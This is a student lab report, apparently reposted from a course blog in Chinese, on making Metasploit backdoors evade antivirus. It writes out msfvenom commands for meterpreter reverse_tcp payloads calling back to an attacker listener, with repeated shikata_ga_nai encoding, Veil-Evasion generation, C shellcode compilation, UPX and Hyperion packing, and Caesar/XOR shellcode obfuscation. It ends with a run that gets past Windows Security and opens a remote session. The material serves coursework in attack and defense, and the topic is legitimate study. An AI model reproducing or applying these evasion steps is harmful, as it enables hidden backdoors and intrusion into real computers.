首页 > 其他分享 >20222406 2024-2025-1 《网络与系统攻防技术》实验三实验报告

20222406 2024-2025-1 《网络与系统攻防技术》实验三实验报告

时间:2024-10-22 17:00:47浏览次数:5  
标签:exe LHOST tcp 2024 2025 20222406 msfvenom 输入

20222406 2024-2025-1 《网络与系统攻防技术》实验三实验报告

1.实验内容

1.1 实践内容

  • 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
  • 通过组合应用各种技术实现恶意代码免杀
  • 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

1.2 回答问题

  • 杀软是如何检测出恶意代码的?
  1. 基于特征码检测
  2. 基于启发式检测
  3. 基于行为的检测
  4. 基于机器学习的检测
  • 免杀是做什么?

    免杀是一种能使病毒木马免于被杀毒软件查杀的技术。其主要目的是让恶意代码或黑客工具能够在目标系统上运行而不被安全软件发现和阻止,以便黑客能够实现攻击、窃取信息等恶意行为。

  • 免杀的基本方法有哪些?

  1. 改变特征码
    如加壳,修改代码,编码转换
  2. 改变程序行为
    如反弹式连接,使用隧道技术,加密通讯数据
  3. 利用漏洞
  4. 修改文件属性

2.实验过程

2.1 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

2.1.1 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

输入msfvenom --list formats查看msfvenom支持的所有输出格式:

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.128 LPORT=2406 -f exe > 20222406.exe生成payload(此处使用kali的IP地址):

将文件拖入桌面,使用 - Virustatol进行检测:

输入msfvenom --list encoders查看msfvenom支持的所有编码方式:


输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.137.128 LPORT=2406 -f exe > 20222406_1.exe使用编码器对payload进行编码:


输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.137.128 LPORT=2406 -f exe > 20222406_2.exe多次编码(-i 10表示编码10次):


输入msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.137.128 LPORT=2406 -f jar > 20222406_3.jar选择一个适用于Java环境的payload来生成jar文件:


输入msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.137.128 LPORT=2406 -e x86/shikata_ga_nai -i 10 -f jar > 20222406_4.jar使用编码器对payload进行编码:


输入msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.137.128 LPORT=2406 -f elf > 20222406_5.elf生成一个反向TCP连接的Linux elf可执行文件:


输入msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.137.128 LPORT=2406 -e x86/shikata_ga_nai -i 10 -f elf > 20222406_6.elf使用编码器对payload进行编码:

2.1.2 使用veil工具加壳工具

依次输入以下命令,安装veil:
mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi

wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

sudo apt-get install libncurses5*

sudo apt-get install libavutil55*

sudo apt-get install gcc-mingw-w64*

sudo apt-get install wine32

此时出现报错,分别输入dpkg --add-architecture i386sudo apt-get updatesudo apt-get install wine32


再依次输入:
apt-get install veil

cd /usr/share/veil/config/
vim setup.sh,翻到图示位置:

i进入编辑模式,把下载地址换成https://gitee.com/spears/VeilDependencies.git,按ESC键,输入:wq退出。
输入veil进行安装,过程中需要安装多个程序,一路默认安装:

发现报错,输入sudo /usr/share/veil/config/setup.sh --force --silent继续安装:

输入veil

输入use evasion,进入Evil—Evasion:

输入list,查看可使用的payload类型:

输入use 7使用c/meterpretermrev_tcp.py:

依次输入:
set LHOST 192.168.137.128
set LPORT 2406
generate

输入生成的文件名称:20222406_veil

输入exit退出后输入cd /var/lib/veil/output/compiled/,进入文件夹,输入ls查看生成的.exe可执行文件:

使用VirusTotal进行检测:

2.1.3 使用C + shellcode编程

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.128 LPORT=2406 -f c(其中LHOST为Kali的IP地址):

输入touch 20222406.cvim 20222406.c新建文件,并进行编辑,
i将使用msfvenom生成的buf[]数组复制粘贴到打开的文件中,并输入C语言代码:

输入i686-w64-mingw32-g++ 20222406.c -o 20222406.exels

使用VirusTotal进行检测:

2.1.4 加壳工具

输入upx 20222406.exe -o upx20222406.exe进行upx加壳:

输入cp upx20222406.exe /usr/share/windows-resources/hyperion进行hyperion加壳:;
输入cd /usr/share/windows-resources/hyperion进入文件夹;
输入ls查看生成的可执行文件:

输入wine hyperion.exe -v upx20222406.exe upx20222406_1.exe

对两个exe文件使用VirusTotal进行检测:

2.2 通过组合应用各种技术实现恶意代码免杀

2.2.1 msfvenom多次编码+压缩加壳

输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 24 -b '\x00' LHOST=192.168.137.128 LPORT=2406 -f exe >20222406_4.exe

再输入upx 20222406_7.exe -o upx20222406_2.exe利用多次编码方式生成后门软件并进行加壳处理:

上传至VirusTotal检测:

2.2.2 C+shellcode编码+异或处理

输入msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.137.128 LPORT=2406 -f c通过msfvenom生成Shellcode数组:

输入touch 20222406_8.c新建文件和vim 20222406_8.c输入代码:


代码功能为将复制内容放入shellcode1[]数组中,通过代码将shellcode1进行凯撒加密,
并在同文件夹下新建空文件20222406_9.txt:

输入gcc 20222406_8.c -o 20222406_8.exe./20222406_8.exe:

此时密文已经输入到其中了:

将密文替换入程序中,修改代码:

接下来进行检测:

此时可见,效果已经大大改善。

2.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 3 -b '\x00' LHOST=192.168.137.128 LPORT=2406 -f raw >20222406.raw

将生成的文件20222406.raw拖入windows中:

此处我使用的是win11自带的Windows安全中心。
此时参照实验二的步骤,分别输入msfconsole进入控制台:

再依次输入
use exploit/multi/handler配置监听模块,
set payload windows/meterpreter/reverse_tcp使用和生成后门程序时相同的payload,
set LHOST 192.168.137.128使用kali的IP,需要和之前生成后门程序时设置的IP相同,
set LPORT 2406设置端口,需要和之前生成后门程序时设置的端口相同:

通过链接安装 - shellcode_launcher

在win的命令行中输入.\shellcode_launcher.exe -i 20222406.raw来启动文件:

接下来在kali中继续输入exploit

此时输入ls出现目录,这说明我们的病毒侵入成功:

3.问题及解决方案

  • 问题1:在2.1.2处输入sudo apt-get install wine32会报错
  • 问题1解决方案:分别输入dpkg --add-architecture i386sudo apt-get updatesudo apt-get install wine32

4.学习感悟、思考等

在本次实验中,我初步了解了恶意代码免杀技术的复杂性与多样性。通过使用各种工具和技巧,如msf编码器、veil-evasion、shellcode编程等,切实体会到了网络攻防技术的博弈性。
同时,也认识到杀毒软件在不断升级检测手段,而恶意代码的免杀方法也在不断演进。这让我深刻理解到个人PC和企业电脑要加装更加高级的防病毒系统的重要性。

参考资料

标签:exe,LHOST,tcp,2024,2025,20222406,msfvenom,输入
From: https://www.cnblogs.com/wangdarui/p/18490064

相关文章

  • 多校A层冲刺NOIP2024模拟赛11
    多校A层冲刺NOIP2024模拟赛11\(T1\)A.冒泡排序\(100pts/100pts/100pts\)将循环\(j\)提到外面,本质上是对\(a_{j},a_{j+k},a_{j+2k},\dots,a_{j+xk}\)进行排序迭代的过程。按下标模\(k\)的余数分别排序即可。点击查看代码inta[1000010];vector<int>b[1000......
  • 20222427 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    1.实践内容1.1本周知识总结深入学习关于缓冲区溢出的基础知识。学习了关于后门的一些基础知识。1.2回答问题(1)杀软是如何检测出恶意代码的?病毒特征码检测加密文件分析基于行为检测的主动防御病毒云查杀(2)免杀是做什么?免杀,即Anti-AntiVirus(简写VirusAV......
  • 2024年软件设计师中级(软考中级)详细笔记【9】数据库技术基础(分值6分)
    目录前言第9章数据库技术基础(6分)9.1基本概念9.1.1数据库与数据库系统9.1.5数据库的三级模式结构9.2数据模型9.2.1数据模型的基本概念9.2.2数据模型的三要素9.2.3E-R模型9.2.4数据模型9.3关系代数9.3.1关系数据库的基本概念9.3.1.1关系模型9.3.25种基本的......
  • 【IEEE独立出版(ISBN号:979-8-3315-2986-4) | 连续多届稳定检索 | 大咖云集 | IEEE计算智
    重要信息大会网站:https://ais.cn/u/VRr6Rf【投稿参会】大会时间:2024年12月13-15日大会地点:中国-广州截稿时间:以官网信息为准出版检索:IEEE出版,见刊后由出版社提交至IEEEXplore, EI,Scopus检索组织单位征稿主题参会方式1、作者参会:一篇录用文章允许1名作者免......
  • 【西安理工大学主办,八大高校联合协办并重点推荐/品牌会议/JPCS独立出版,EI, Scopus稳定
    重要信息大会网站:https://ais.cn/u/2yymE3【投稿参会】截稿时间:以官网信息为准线下召开:2024年11月29日-12月1日会议地点:陕西·西安收录检索:EI,Scopus稳定双检索!征稿主题出版信息所录用的论文将以论文集形式递交JPCS出版,并提交至EICompendex,Scopus检索。......
  • 2024.10.22总结
    本文于github博客同步更新。今天打两场byd放三道黑是吧。第一场:A:CF1261F将区间拆分为\([x2^{i},(x+1)2^{i})\)的形式,发现两个区间中的数两两异或后形成的仍为一个区间,将A,B都拆分后区间两两异或会得到\(O(n^2\log^2n)\)个区间,取并即为答案,但复杂度无法接受。发现对......
  • 2024秋软工实践 爱码单车队展示与选题报告
    作业所属课程班级链接作业要求作业要求链接作业的目标开发一个基于LLM大模型接口的软件,为传统的软件赋予全新的体验和功能。团队名称爱码单车队成员1102201542--曾庆徽成员2102201211--池家益成员3102201302--毛震成员4102201420--林传昊成......
  • 2024牛客暑期多校训练营9 - VP记录
    A.ImageScaling签到题,找出举行宽高以后直接除以它们的\(\gcd\)使它们互质即可。(这道题居然会有人又WA又RE,我不说是谁)点击查看代码#include<cstdio>#include<cstring>usingnamespacestd;constintN=505;intn,m,x1,y1,x2,y2;charg[N][N];intgcd(intx,int......
  • 多校A层冲刺NOIP2024模拟赛11
    又双叒叕垫底了。rank11,T190,T212,T35,T435。accdoer上rank44,T1100,T20,T35,T435。难度难评,T1签,剩下的不可做?死磕T3了,猜一个结论假一个,打完暴力遗憾离场。好像两个题库都挂了几分,不管了,赛前挂分RP就++。慢报:5k_sync_closer成功地取得了NFLS模拟赛第一名的好成绩。冒泡......
  • Adobe Photoshop PS2024软件下载与安装步骤
    一、AdobePhotoshop软件简介1.1软件概述AdobePhotoshop(简称PS)是由Adobe公司开发的一款功能强大的图像处理软件,广泛应用于广告设计、摄影后期、数字绘画、网页设计等各个领域。它提供了丰富的图像编辑工具,如颜色、亮度、对比度、饱和度调整,以及图像的切割、缩放、旋转、变......